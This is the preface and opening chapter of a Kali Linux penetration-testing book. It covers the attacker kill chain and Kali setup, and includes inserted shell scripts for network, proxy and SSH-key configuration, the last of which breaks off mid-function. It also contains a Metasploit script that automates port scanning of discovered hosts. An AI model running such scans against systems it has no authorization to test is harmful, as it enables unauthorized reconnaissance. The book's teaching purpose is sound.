Preface



This book is dedicated to the use of Kali Linux in performing penetration tests
against networks. A penetration test simulates an attack against a network or
a system by a malicious outsider or insider. Unlike a vulnerability assessment,
penetration testing is designed to include the exploitation phase. Therefore, it
proves that the vulnerability is present and exploitable, and that it carries
the very real risk of compromise if it is not acted upon.

Throughout this book, we will refer to "penetration testers," "attackers,"
and "hackers" interchangeably as they use the same techniques and tools to
assess the security of networks and data systems. The only difference between
them is their end objective: a secure data network, or a data breach.

Most testers and attackers follow an informal, open source, or proprietary-defined 
testing methodology that guides the testing process. There are certain advantages of 
following a methodology: 

• A methodology identifies parts of the testing process that can be automated 
(for example, a tester may always use a ping sweep to identify potential 
targets; therefore, this can be scripted), allowing the tester to focus on 
creative techniques to find and exploit vulnerabilities 

• The results are repeatable, allowing them to be compared over time or to 
cross-validate one tester's results against another, or to determine how the 
security of the target has improved (or not!) over time 

• A defined methodology is predictable in terms of time and personnel 
requirements, allowing costs to be controlled and minimized 

• A methodology that has been preapproved by the client protects the tester
against liability in the event there is any damage to the network or data





Formal methodologies include the following well-known examples:

• Kevin Orrey's penetration testing framework: This methodology walks
the tester through the sequenced steps of a penetration test, providing
hyperlinks to tools and relevant commands. More information can be found
at www.vulnerabilityassessment.co.uk.

• Information Systems Security Assessment Framework (ISSAF): This
comprehensive guide aims to be the single source for testing a network.
More information on this can be found at www.oissg.org.

• NIST SP 800-115, Technical Guide to Information Security Testing and
Assessment: Written in 2008, its four-step methodology is somewhat
outdated. However, it does provide a good overview of the basic steps in
penetration testing. You can get more information at
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf.

• Open Source Security Testing Methodology Manual (OSSTMM): This is one
of the older methodologies, and the latest version attempts to quantify
identified risks. More details can be found at www.osstmm.org.

• Open Web Application Security Project (OWASP): Best known for its Top 10
list of the most common vulnerabilities in web-based applications; it also
publishes a web application testing guide. More information on this can be
found at www.owasp.org.

• Penetration Testing Execution Standard (PTES): Actively maintained, this
methodology is complete and accurately reflects the activities of a
malicious person. You can get more information at www.pentest-standard.org.

• Offensive (Web) Testing Framework (OWTF): Introduced in 2012, this is a
very promising direction in combining the OWASP approach with the more
complete and rigorous PTES methodology. More details can be found at
https://github.com/7a/owtf.

Unfortunately, the use of a structured methodology can introduce weaknesses into 
the testing process: 

• Methodologies rarely consider why a penetration test is being undertaken, or 
which data is critical to the business and needs to be protected. In the absence 
of this vital first step, penetration tests lose focus. 

• Many penetration testers are reluctant to follow a defined methodology, 
fearing that it will hinder their creativity in exploiting a network. 
• Penetration testing often fails to reflect the actual activities of a
malicious attacker. Frequently, the client wants to see if you can gain
administrative access on a particular system ("Can you root the box?").
However, the attacker may be focused on copying critical data in a manner
that does not require root access, or on causing a denial of service.

To address the limitations inherent in formal testing methodologies, they must 
be integrated in a framework that views the network from the perspective of an 
attacker, the "kill chain." 

The "Kill Chain" approach to penetration testing

In 2009, Mike Cloppert of Lockheed Martin CERT introduced the concept that is
now known as the "attacker kill chain." This describes the steps taken by an
adversary when attacking a network. It does not always proceed in a linear
flow, as some steps may occur in parallel. Multiple attacks may be launched
over time at the same target, and overlapping stages may occur at the same
time.

In this book, we have modified Cloppert's kill chain to more accurately
reflect how attackers apply these steps when exploiting networks and data
services.

The following diagram shows a typical kill chain of an attacker:

[Diagram: a typical attacker kill chain, showing the reconnaissance,
delivery, exploit, action on the objective, and persistence phases
described below]

A typical kill chain of an attacker can be described as follows: 



• Reconnaissance phase - The adage, "reconnaissance time is never wasted 
time", adopted by most military organizations acknowledges that it is better 
to learn as much as possible about an enemy before engaging them. For the 
same reason, attackers will conduct extensive reconnaissance of a target 
before attacking. In fact, it is estimated that at least 70 percent of the "work 
effort" of a penetration test or an attack is spent conducting reconnaissance! 
Generally, they will employ two types of reconnaissance: 

° Passive reconnaissance - This does not directly interact with the 
target in a hostile manner. For example, the attacker will review 
the publicly available website(s), assess online media (especially 
social media sites), and attempt to determine the "attack surface" 
of the target. 

One particular task will be to generate a list of past and current 
employee names. These names will form the basis of attempts 
to brute force, or guessing passwords. They will also be used 
in social engineering attacks. 

This type of reconnaissance is difficult, if not impossible, 
to distinguish from the behavior of regular users. 

° Active reconnaissance - This can be detected by the target, but it can
be difficult to distinguish from the background noise of scanning that
most Internet-facing organizations see constantly.

Activities occurring during active reconnaissance include 
physical visits to target premises, port scanning, and remote 
vulnerability scanning. 

• The delivery phase - Delivery is the selection and development of 
the weapon that will be used to complete the exploit during the attack. 

The exact weapon chosen will depend on the attacker's intent as well 
as the route of delivery (for example, across the network, via wireless, 
or through a web-based service). The impact of the delivery phase will 
be examined in the second half of this book. 
• The exploit or compromise phase - This is the point when a particular
exploit is successfully applied, allowing attackers to reach their objective.

The compromise may have occurred in a single phase (for example, a known 
operating system vulnerability was exploited using a buffer overflow), 

or it may have been a multiphase compromise (for example, an attacker 
physically accessed premises to steal a corporate phone book. The names 
were used to create lists for brute force attacks against a portal logon. In 
addition, e-mails were sent to all employees to click on an embedded link to 
download a crafted PDF file that compromised their computers.). Multiphase 
attacks are the norm when a malicious attacker targets a specific enterprise. 

• Post exploit: action on the objective - This is frequently, and incorrectly, 
referred to as the "exfiltration phase" because there is a focus on perceiving 
attacks solely as a route to steal sensitive data (such as login information, 
personal information, and financial information); it is common for an attacker 
to have a different objective. For example, a business may wish to cause a 
denial of service in their competitor's network to drive customers to their 
own website. Therefore, this phase must focus on the many possible actions 
of an attacker. 

One of the most common post-exploit activities is the attempt to raise
access privileges to the highest possible level (vertical escalation) and
to compromise as many accounts as possible (horizontal escalation).

• Post exploit: persistence - If there is value in compromising a network or 
system, then that value can likely be increased if there is persistent access. 
This allows attackers to maintain communications with a compromised 
system. From a defender's point of view, this is the part of the kill chain that 
is usually the easiest to detect. 

Kill chains are metamodels of an attacker's behavior when they attempt to
compromise a network or a particular data system. As a metamodel, the kill
chain can incorporate any proprietary or commercial penetration testing
methodology. Unlike the methodologies, however, it ensures a strategic-level
focus on how an attacker approaches the network. This focus on the attacker's
activities will guide the layout and content of this book.
What this book covers

This book is divided into two parts. In Part 1, The Attacker's Kill Chain, we will follow 
the steps of a kill chain, analyzing each phase in detail. In Part 2, The Delivery Phase, 
we will focus on the delivery phase and some of the available methodologies to 
understand how attacks take place, and how this knowledge can be used to secure 
a network. 

Chapter 1, Starting with Kali Linux, introduces the reader to the fundamentals of Kali 
Linux, and its optimal configuration to support penetration testing. 

Chapter 2, Identifying the Target - Passive Reconnaissance, provides a background on 
how to gather information about a target using publicly available sources, and the 
tools that can simplify the reconnaissance and information management. 

Chapter 3, Active Reconnaissance and Vulnerability Scanning, introduces the reader to 
stealthy approaches that can be used to gain information about the target, especially 
the information that identifies vulnerabilities, which could be exploited. 

Chapter 4, Exploit, demonstrates the methodologies that can be used to find and 
execute exploits that allow a system to be compromised by an attacker. 

Chapter 5, Post Exploit - Action on the Objective, describes how attackers can 
escalate their privileges to achieve their objective for compromising the system, 
including theft of data, altering data, launching additional attacks, or creating a 
denial of service. 

Chapter 6, Post Exploit - Persistence, provides a background on how to configure 
a compromised system so that the attacker can return at will and continue 
post-exploit activities. 

Chapter 7, Physical Attacks and Social Engineering, demonstrates why being able to 
physically access a system or interact with the humans who manage it provides 
the most successful route to exploitation. 

Chapter 8, Exploiting Wireless Communications, demonstrates how to take advantage 
of common wireless connections to access data networks and isolated systems. 

Chapter 9, Reconnaissance and Exploitation of Web-based Applications, provides a 
brief overview of one of the most complex delivery phases to secure: web-based 
applications that are exposed to the public Internet. 
Chapter 10, Exploiting Remote Access Communications, provides an increasingly
important route into systems as more and more organizations adopt distributed 
and work-from-home models that rely on remote access communications that are 
themselves vulnerable to attack. 

Chapter 11, Client-side Exploitation, focuses on attacks against applications on the 
end-user's systems, which are frequently not protected to the same degree as the 
organization's primary network. 

Appendix, Installing Kali Linux, provides an overview of how to install Kali Linux,
and how to employ a whole-disk encryption to avoid an intercept of confidential 
testing data. 

What you need for this book 

In order to practice the material presented in this book, you will need virtualization 
tools such as VMware or VirtualBox. 

You will need to download and configure the Kali Linux operating system and its 
suite of tools. To ensure that it is up-to-date and that you have all of the tools, you 
will need access to an Internet connection. 

Sadly, not all of the tools on the Kali Linux system will be addressed since there are 
too many of them. The focus of this book is not to inundate the reader with all of 
the tools and options, but to provide an approach for testing that will give them the 
opportunity to learn and incorporate new tools as their experiences and knowledge 
change over time. 

Although most of the examples from this book focus on Microsoft Windows, the 
methodology and most of the tools are transferrable to other operating systems 
such as Linux and the other flavors of Unix. 

Finally, this book applies Kali to complete the attacker's kill chain against target 
systems. You will need a target operating system. Many of the examples in
the book use Microsoft Windows XP. Although Microsoft ended support for it in
April 2014, it provides a "baseline" of standard behavior for many of the
tools. If you know how to apply the methodology to one operating system, you
can apply it to more recent operating systems such as Windows 7 and
Windows 8.
Who this book is for

This book is intended for people who want to know more about data security. 

In particular, it targets people who want to understand why they use a particular 
tool when they do, as opposed to those people who throw as many tools as possible 
at a system to see if an exploit will happen. My goal is for the readers to
develop their own method and approach to effective penetration testing, which
will allow them to experiment and learn as they progress. I believe that this
approach is the only effective way to understand how malicious people attack
data systems, and therefore, the only way to understand how to remediate
vulnerabilities before they can be exploited.

If you are a security professional, penetration tester, or just have an interest in the 
security of complex data environments, this book is for you. 



Conventions 

In this book, you will find a number of styles of text that distinguish between 
different kinds of information. Here are some examples of these styles, and an 
explanation of their meaning. 

Code words in text, database table names, folder names, filenames, file extensions, 
pathnames, dummy URLs, user input, and Twitter handles are shown as follows: 
"In this particular case, the VM has been assigned an IP address of 
192.168.204.132." 

A block of code is set as follows: 



    # MSF port scanner
    on host_add {
        println("[*] MSF Port Scanner New Host OpenPorts on $1");
        $console = console();
        cmd($console, "use auxiliary/scanner/portscan/tcp");
        cmd($console, "set THREADS 12");
        cmd($console, "set PORTS 139, 143");
        # enter other ports as required
        cmd($console, "set RHOSTS $1");
        cmd($console, "run -j");
        cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
        cmd($console, "set THREADS 12");
        cmd($console, "set BATCHSIZE 256");
        cmd($console, "set RHOSTS $1");
        cmd($console, "run -j");
        db_sync();
    }

Any command-line input or output is written as follows:

    root@kali:~# update-rc.d networking defaults

New terms and important words are shown in bold. Words that you see on the
screen, in menus or dialog boxes for example, appear in the text like this:
"If you double-click on the truecrypt icon, you will be taken to a File
Browser view."

Warnings or important notes appear in a box like this.



Tips and tricks appear like this. 



Reader feedback 

Feedback from our readers is always welcome. Let us know what you think about 
this book — what you liked or may have disliked. Reader feedback is important for us 
to develop titles that you really get the most out of. 

To send us general feedback, simply send an e-mail to feedback@packtpub.com,
and mention the book title via the subject of your message.

If there is a topic that you have expertise in and you are interested in either writing 
or contributing to a book, see our author guide on www.packtpub.com/authors.

Customer support 

Now that you are the proud owner of a Packt book, we have a number of things to 
help you to get the most from your purchase. 
Errata

Although we have taken every care to ensure the accuracy of our content, mistakes 
do happen. If you find a mistake in one of our books — maybe a mistake in the text or 
the code— we would be grateful if you would report this to us. By doing so, you can 
save other readers from frustration and help us improve subsequent versions of this 
book. If you find any errata, please report them by visiting
http://www.packtpub.com/submit-errata, selecting your book, clicking on the
errata submission form link, and entering the details of your errata. Once
your errata are verified, your submission will be accepted and the errata
will be uploaded on our website, or added to any list of existing errata,
under the Errata section of that title. Any existing errata can be viewed by
selecting your title from http://www.packtpub.com/support.

Piracy 

Piracy of copyright material on the Internet is an ongoing problem across all media. 
At Packt, we take the protection of our copyright and licenses very seriously. If you 
come across any illegal copies of our works, in any form, on the Internet, please 
provide us with the location address or website name immediately so that we can 
pursue a remedy. 

Please contact us at copyright@packtpub.com with a link to the suspected
pirated material. 

We appreciate your help in protecting our authors, and our ability to bring 
you valuable content. 

Questions 

You can contact us at questions@packtpub.com if you are having a problem with
any aspect of the book, and we will do our best to address it. 
Disclaimer



The content within this book is for educational purposes only. It is designed to help 
users test their own system against information security threats and protect their 
IT infrastructure from similar attacks. Packt Publishing and the author of this book 
take no responsibility for actions resulting from the inappropriate usage of learning 
materials contained within this book. 




Part 1

The Attacker's Kill Chain

Starting with Kali Linux

Identifying the Target - Passive Reconnaissance

Active Reconnaissance and Vulnerability Scanning

Exploit

Post Exploit - Action on the Objective

Post Exploit - Persistence




Starting with Kali Linux 

Kali Linux (Kali) is the successor to the BackTrack penetration testing platform 
which is generally regarded as the de facto standard package of tools used to facilitate 
penetration testing to secure data and voice networks. This chapter provides an 
introduction to Kali, and focuses on customizing Kali to support some advanced 
aspects of penetration testing. By the end of this chapter, you will have learned: 

• An overview of Kali 

• Configuring network services and secure communications 

• Updating Kali 

• Customizing Kali 

• Extending Kali's functionality with third-party applications 

• Effective management of penetration tests 



Kali Linux 

BackTrack (BT), (www.offensive-security.com) was released to provide an
extensive variety of penetration testing and defensive tools that were
perfect for auditors and network administrators interested in assessing and
securing their networks. The same tools were used by authorized penetration
testers and by unauthorized attackers (hackers) alike.

The final version of BackTrack, BT 5r3, was released in August 2012. Based on 
the Ubuntu Linux platform, it was widely adopted and supported by the security 
community. Unfortunately, its file architecture made it difficult to manage the 
array of tools and their accompanying dependencies. 





In BackTrack, all of the tools used for penetration testing were placed in the 
/pentest directory. Subfolders such as /web or /database helped to further define 
the location of tools. Finding and executing tools within this hierarchy could be 
counterintuitive. For example, is sqlninja, which identifies an SQL injection, a web 
vulnerability assessment tool, a web exploit tool, or a database exploit tool? 

In March 2013, BackTrack was superseded by Kali Linux, which uses a new
platform architecture based on the Debian GNU/Linux operating system.

Debian adheres to the Filesystem Hierarchy Standard (FHS), which is a
significant advantage over BackTrack. Instead of needing to navigate through
the /pentest tree, you can call a tool from anywhere on the system because
applications are included in the system path.

Other features of Kali include the following:

• Support for multiple desktop environments such as GNOME, KDE, LXDE,
and XFCE, together with multilingual support.

• Debian-compliant tools are synchronized with the Debian repositories
at least four times daily, making it easier to update packages and apply
security fixes.

• Support for ISO customizations, allowing users to build their own versions
of Kali. The bootstrap function also performs enterprise-wide network installs
that can be automated using preseed files.

• ARMEL and ARMHF support allows Kali to be installed on devices such as
the Raspberry Pi, ODROID-U2/-X2, and the Samsung Chromebook.

• Over 300 penetration testing, data forensics, and defensive tools are
included. They provide extensive wireless support with kernel patches to
permit the packet injection required by some wireless attacks.

• Kali remains an open source project that is free. Most importantly, it is
well supported by an active online community.

Throughout this book, we'll be using a VMware virtual machine (VM) of 64-bit 
Kali (refer to Appendix, Installing Kali Linux for instructions on installing Kali). 

A VM is used because it makes it easy to rapidly execute certain applications 
in other operating systems, such as Microsoft Windows. In addition, a VM can 
be archived with the results from a penetration test, allowing the archive to be 
reviewed to determine if a particular vulnerability would have been detected 
with the toolset that was used for testing. 
When Kali is launched, the user will be taken to the default desktop GUI with a
menu bar at the top and a few simple icons. By selecting the menu item
Applications, and then Kali Linux, the user will gain access to a menu system
that contains the Top 10 Security Tools as well as a series of folders,
organized in the general order that would be followed during a penetration
test. The Applications menu lists the usual desktop categories (Accessories,
Electronics, Graphics, Internet, Kali Linux, Office, Programming, Sound &
Video, System Tools); the Kali Linux submenu contains:

    Top 10 Security Tools
    Information Gathering
    Vulnerability Analysis
    Web Applications (CMS Identification, Database Exploitation,
        IDS/IPS Identification, Web Application Fuzzers,
        Web Application Proxies, Web Crawlers,
        Web Vulnerability Scanners)
    Password Attacks
    Wireless Attacks
    Exploitation Tools
    Sniffing/Spoofing
    Maintaining Access
    Reverse Engineering
    Stress Testing
    Hardware Hacking
    Forensics
    Reporting Tools
    System Services

The menu will be familiar to users of BT 5r3. However, there 
are some changes, which include simplified access to network 
services and communications. 



Configuring network services and secure communications

The first step in being able to use Kali is to ensure that it has connectivity to either a 
wired or wireless network to support updates and customization. 

You may need to obtain an IP address by DHCP (Dynamic Host Configuration
Protocol), or assign one statically. First, confirm your IP address using the
ifconfig command from a terminal window, as shown in the following listing:

    root@kali:~# ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:0c:29:56:0d:09
              inet addr:192.168.204.132  Bcast:192.168.204.255  Mask:255.255.255.0
              inet6 addr: fe80::20c:29ff:fe56:d09/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:631852 errors:0 dropped:0 overruns:0 frame:0
              TX packets:359462 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:873309953 (832.8 MiB)  TX bytes:38805419 (37.0 MiB)

    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:65536  Metric:1
              RX packets:157544 errors:0 dropped:0 overruns:0 frame:0
              TX packets:157544 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:37806955 (36.0 MiB)  TX bytes:37806955 (36.0 MiB)



In this particular case, the VM has been assigned an IP address of
192.168.204.132. If an IP address was not obtained, an address can be
requested by DHCP using the command dhclient eth0 (or another available
interface, depending on the specific configuration of the system being used).

If a static IP address is used, additional information may be required. For example, 
you can assign a static IP of 192 . 168 . 204. 128 as follows: 

host IP address: 192.168.204.128 

subnet mask: 255.255.255.0 

default gateway: 192.168.204.1 

DNS server: 192.168.204.10 
Enter a terminal window and enter the following commands:

    root@kali:~# ifconfig eth0 192.168.204.128/24
    root@kali:~# route add default gw 192.168.204.1
    root@kali:~# echo nameserver 192.168.204.10 > /etc/resolv.conf

Changes made to IP settings are nonpersistent, and will be lost when Kali is
rebooted. To make the changes permanent, you will need to edit the
/etc/network/interfaces file, as shown in the following listings (the
original file, and the edited file):



Original:

    auto lo
    iface lo inet loopback

    # primary network interface
    auto eth0
    iface eth0 inet dhcp

    auto eth1
    iface eth1 inet dhcp

    auto eth2
    iface eth2 inet dhcp

    auto ath0
    iface ath0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

Edited:

    auto lo
    iface lo inet loopback

    # edited to maintain persistent state
    auto eth0
    iface eth0 inet static
        address 192.168.204.128
        netmask 255.255.255.0
        network 192.168.204.0
        broadcast 192.168.204.255
        gateway 192.168.204.1

    auto eth1
    iface eth1 inet dhcp

    auto eth2
    iface eth2 inet dhcp

    auto ath0
    iface ath0 inet dhcp

    auto wlan0
    iface wlan0 inet dhcp

The DNS server is not part of this stanza: keep /etc/resolv.conf updated as
shown above (a dns-nameservers line in the stanza only takes effect when the
resolvconf package is installed).

By default, Kali does not start networking (and therefore its DHCP client) at
boot. Bringing an interface up announces the new IP address on the network,
and this may alert administrators to the presence of the tester. For some
test cases this is not an issue, and it may be advantageous to have
networking start automatically during boot up. This can be achieved by
entering the following commands:

    root@kali:~# update-rc.d networking defaults
    root@kali:~# /etc/init.d/networking restart

Kali installs with network services that can be started or stopped as required, 
including DHCP, HTTP, SSH, TFTP, and the VNC server. These services are usually 
invoked from the command line, however, some are accessible from the Kali menu. 
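The static address procedure above, scripted as an added example (this is not code from the book): the script derives the netmask, network and broadcast values that the static stanza needs from an address given in CIDR form, checks that the gateway lies inside that subnet, and renders the stanza, so the values cannot drift apart the way hand-typed ones do. apply_static_now mirrors the three non-persistent commands (ifconfig, route, resolv.conf) and only executes them when DRY_RUN=0 and the script runs as root; the interface name, the addresses and the DRY_RUN variable are this example's assumptions.

```shell
#!/bin/sh
# Added example (not from the book): derive the netmask, network and
# broadcast values a static stanza needs from an address in CIDR form,
# validate them, and render the stanza for /etc/network/interfaces.
# apply_static_now mirrors the three ifconfig/route/resolv.conf commands
# in the text; it only executes them when DRY_RUN=0 and we are root.
# The interface name, addresses and DRY_RUN flag are our assumptions.

# Dotted quad -> 32-bit integer. Rejects anything that is not four
# decimal octets in 0..255 (leading zeros are refused too, since the
# shell would read "010" as octal).
ip_to_int() {
    _ip=$1
    _ifs=$IFS; IFS=.; set -- $_ip; IFS=$_ifs
    [ $# -eq 4 ] || return 1
    for _o in "$1" "$2" "$3" "$4"; do
        case $_o in ''|*[!0-9]*|0?*) return 1 ;; esac
        [ "$_o" -le 255 ] || return 1
    done
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# Prefix length -> dotted netmask, e.g. 24 -> 255.255.255.0
cidr_to_netmask() {
    case $1 in ''|*[!0-9]*|0?*) return 1 ;; esac
    [ "$1" -le 32 ] || return 1
    int_to_ip $(( (0xFFFFFFFF << (32 - $1)) & 0xFFFFFFFF ))
}

network_addr() { # ADDR PREFIX
    _i=$(ip_to_int "$1") || return 1
    _m=$(ip_to_int "$(cidr_to_netmask "$2")") || return 1
    int_to_ip $(( _i & _m ))
}

broadcast_addr() { # ADDR PREFIX
    _i=$(ip_to_int "$1") || return 1
    _m=$(ip_to_int "$(cidr_to_netmask "$2")") || return 1
    int_to_ip $(( (_i & _m) | (~_m & 0xFFFFFFFF) ))
}

# Render the "Edited" stanza from the chapter for any address/prefix,
# refusing a gateway outside the subnet (route add would fail anyway).
render_static_stanza() { # IFACE ADDR PREFIX GATEWAY
    ip_to_int "$2" >/dev/null || { echo "bad address: $2" >&2; return 1; }
    ip_to_int "$4" >/dev/null || { echo "bad gateway: $4" >&2; return 1; }
    _net=$(network_addr "$2" "$3") || { echo "bad prefix: $3" >&2; return 1; }
    [ "$(network_addr "$4" "$3")" = "$_net" ] \
        || { echo "gateway $4 is not inside $_net/$3" >&2; return 1; }
    cat <<EOF
# edited to maintain persistent state
auto $1
iface $1 inet static
    address $2
    netmask $(cidr_to_netmask "$3")
    network $_net
    broadcast $(broadcast_addr "$2" "$3")
    gateway $4
EOF
}

# Non-persistent equivalent of the commands typed in the text. The DNS
# server is not part of the interfaces stanza, so it is set here.
apply_static_now() { # IFACE ADDR PREFIX GATEWAY DNS
    if [ "${DRY_RUN:-1}" = 0 ] && [ "$(id -u)" -eq 0 ]; then _run=eval; else _run=echo; fi
    $_run "ifconfig $1 $2 netmask $(cidr_to_netmask "$3")"
    $_run "route add default gw $4"
    $_run "echo nameserver $5 > /etc/resolv.conf"
}

# Usage with the chapter's values (dry run unless DRY_RUN=0 as root):
render_static_stanza eth0 192.168.204.128 24 192.168.204.1
apply_static_now eth0 192.168.204.128 24 192.168.204.1 192.168.204.10
```

Run as-is, the script prints the stanza for the chapter's values and echoes the live commands instead of executing them; once the output looks right, paste the stanza into /etc/network/interfaces in place of the DHCP entry for eth0.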
Adjusting network proxy settings

Users located behind an authenticated or unauthenticated proxy connection
must modify /etc/bash.bashrc and /etc/apt/apt.conf.

1. Using a text editor, add the following lines to the bottom of the
/etc/bash.bashrc file:

    export ftp_proxy="ftp://user:password@proxyIP:port"
    export http_proxy="http://user:password@proxyIP:port"
    export https_proxy="https://user:password@proxyIP:port"
    export socks_proxy="socks5://user:password@proxyIP:port"

The scheme must match the proxy type: a SOCKS proxy takes a socks5:// URL,
not https://, and https_proxy only names the proxy used for HTTPS
destinations, so unless the proxy itself listens on TLS its URL is usually
http://proxyIP:port as well. Few command-line tools consult socks_proxy;
curl, for example, reads all_proxy instead.






2. Replace proxyIP and port with your proxy's IP address and port number
respectively, and replace user and password with your authentication username
and password (percent-encode any reserved characters, such as @ or :, that
appear in them). If there's no need to authenticate, write only the part
following the @ symbol. Note that /etc/bash.bashrc is readable by every
account on the system, so credentials stored there are visible to all local
users.

3. In /etc/apt, create the apt.conf file and enter the following lines:

    Acquire::ftp::proxy "ftp://user:password@proxyIP:port/";
    Acquire::http::proxy "http://user:password@proxyIP:port/";
    Acquire::https::proxy "https://user:password@proxyIP:port/";
    Acquire::socks::proxy "socks5://user:password@proxyIP:port/";

apt has no separate socks fetch method, so the last line is ignored; apt 1.5
and later accept a socks5h:// URL in Acquire::http::proxy instead.



4. Save and close the file. Log out and then log in to activate the new settings. 
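One way to produce both files without hand-editing URLs, as an added example that is not the book's code: the proxy host, port and credentials used below (proxy.example.com, 3128, tester, p@ss:w0rd) are constructed values, and the file paths default to the two named above. The script percent-encodes the credentials so characters such as @ or : in a password cannot break the URL, omits the credential part when no user is given (step 2), and points https_proxy at the proxy over plain HTTP, which is how most proxies expect to be reached for HTTPS destinations; the socks entries are left out because few tools honor them.

```shell
#!/bin/sh
# Added example (not the book's own code): build the proxy URLs for
# bash.bashrc and apt.conf from their parts, percent-encoding the
# credentials, and write both files. proxy.example.com:3128 and the
# user name/password used at the bottom are constructed values.

# Percent-encode everything outside the URL "unreserved" set.
# Assumes single-byte (ASCII) input; printf "'c" yields c's code.
urlencode() {
    _s=$1; _out=
    while [ -n "$_s" ]; do
        _c=${_s%"${_s#?}"}       # first character
        _s=${_s#?}               # the rest
        case $_c in
            [A-Za-z0-9._~-]) _out="$_out$_c" ;;
            *) _out="$_out$(printf '%%%02X' "'$_c")" ;;
        esac
    done
    printf '%s' "$_out"
}

# proxy_url SCHEME HOST PORT [USER PASS] -> scheme://[user:pass@]host:port
# Without USER the credential part is omitted, as step 2 describes.
proxy_url() {
    if [ -n "${4:-}" ]; then
        printf '%s://%s:%s@%s:%s' "$1" "$(urlencode "$4")" "$(urlencode "${5:-}")" "$2" "$3"
    else
        printf '%s://%s:%s' "$1" "$2" "$3"
    fi
}

# Lines appended to /etc/bash.bashrc. https_proxy names the proxy used
# for HTTPS destinations; the proxy itself is reached over plain HTTP
# (CONNECT), hence the http:// scheme. no_proxy keeps local traffic off it.
render_bashrc_exports() { # HOST PORT [USER PASS]
    printf 'export ftp_proxy="%s"\n'   "$(proxy_url ftp  "$@")"
    printf 'export http_proxy="%s"\n'  "$(proxy_url http "$@")"
    printf 'export https_proxy="%s"\n' "$(proxy_url http "$@")"
    printf 'export no_proxy="localhost,127.0.0.1"\n'
}

# Lines for /etc/apt/apt.conf (apt wants a trailing slash).
render_apt_conf() { # HOST PORT [USER PASS]
    printf 'Acquire::ftp::proxy "%s/";\n'   "$(proxy_url ftp  "$@")"
    printf 'Acquire::http::proxy "%s/";\n'  "$(proxy_url http "$@")"
    printf 'Acquire::https::proxy "%s/";\n' "$(proxy_url http "$@")"
}

# Append the exports and (over)write apt.conf. Both files are normally
# world-readable, so a password placed in them is visible to every local
# account on a shared test box.
install_proxy_settings() { # BASHRC_FILE APT_CONF_FILE HOST PORT [USER PASS]
    _bashrc=$1; _apt=$2; shift 2
    { printf '\n# proxy settings\n'; render_bashrc_exports "$@"; } >> "$_bashrc"
    render_apt_conf "$@" > "$_apt"
    echo "wrote $_bashrc and $_apt"
}

# Usage: show what would be written; INSTALL=1 writes the real files.
render_bashrc_exports proxy.example.com 3128 tester 'p@ss:w0rd'
render_apt_conf proxy.example.com 3128 tester 'p@ss:w0rd'
if [ "${INSTALL:-0}" = 1 ]; then
    install_proxy_settings /etc/bash.bashrc /etc/apt/apt.conf \
        proxy.example.com 3128 tester 'p@ss:w0rd'
fi
```

After writing the real files, log out and in again (or source /etc/bash.bashrc) so the exports take effect in your shell; apt reads apt.conf on every run.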

Securing communications with Secure Shell 

To minimize detection by a target network during testing. Kali does not enable any 
externally-listening network services. Some services, such as Secure Shell (SSH), 
are already installed. However, they must be enabled prior to use. 

Kali comes preconfigured with default SSH keys. Before starting the SSH service, 
it's a good idea to disable the default keys and generate a unique keyset for use. 

Move the default SSH keys to a backup folder, and then generate a new SSH keyset 
using the following command: 

dpkg- reconfigure openssh- server 

The process of moving the original keys and generating the new keyset is shown in 
the following screenshot. 

root@kali:~# cd /etc/ssh/
root@kali:/etc/ssh# mkdir keys_default
root@kali:/etc/ssh# mv ssh_host_* keys_default
root@kali:/etc/ssh# dpkg-reconfigure openssh-server
Creating SSH2 RSA key; this may take some time ...
Creating SSH2 DSA key; this may take some time ...
Creating SSH2 ECDSA key; this may take some time ...
insserv: warning: current start runlevel(s) (empty) of script 'ssh' overrides LSB defaults (2345).
insserv: warning: current stop runlevel(s) (2 3 4 5) of script 'ssh' overrides LSB defaults (empty).
root@kali:/etc/ssh#
To verify that the newly generated keys are unique, calculate their md5sum hash
values and compare them with those of the original keys, as shown in the following screenshot.



root@kali:/etc/ssh# md5sum ssh_host_*
3bdee027a57f00f0db89a0bb40b9f5e1  ssh_host_dsa_key
fb64b47d662066c80247e5ab012f7009  ssh_host_dsa_key.pub
13f9e458b804bc1cbe922463668e0c27  ssh_host_ecdsa_key
7c4c041220029c5594a380b96213f883  ssh_host_ecdsa_key.pub
7f3bb5caeab1a3bf77659a4d69d5de46  ssh_host_rsa_key
d29a3bc700a98e13b77aee5eae731090  ssh_host_rsa_key.pub
root@kali:/etc/ssh# cd keys_default/
root@kali:/etc/ssh/keys_default# md5sum *
71a15f49aa0c75ca0f8dadb5802ec1ef  ssh_host_dsa_key
bf1487ee28307fb6ba842857a4aaee14  ssh_host_dsa_key.pub
16ee1071cf65e80c5f6bd9ab6553b4ef  ssh_host_ecdsa_key
f90c3f0b708c4ede4c5e1a3d1e08325a  ssh_host_ecdsa_key.pub
248eb013d46c64a9d61bc579787b4199  ssh_host_rsa_key
8610af2d6d15251f458824268b8817b9  ssh_host_rsa_key.pub
root@kali:/etc/ssh/keys_default#
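
The back-up, regenerate and compare sequence above as a script, added here as an example rather than taken from the book. The directories are parameters so the comparison can be tried on scratch copies; on a live system regen_host_keys moves /etc/ssh/ssh_host_* into the backup directory and calls ssh-keygen -A, which generates a fresh key of every default type that is missing (current OpenSSH no longer generates DSA host keys, so the DSA pair in the screenshot will not reappear). keys_replaced then fails if any new private key is byte-for-byte identical to its backup, which is exactly the condition the md5sum comparison is there to catch.

```sh
#!/bin/sh
# Added example: regenerate SSH host keys and confirm that none of the old
# ones survived. Functions take directories as arguments so the comparison
# can be exercised on scratch copies before touching /etc/ssh.

# Digest of a file: sha256sum where available, cksum as a portable fallback.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum < "$1" | cut -d' ' -f1
    else
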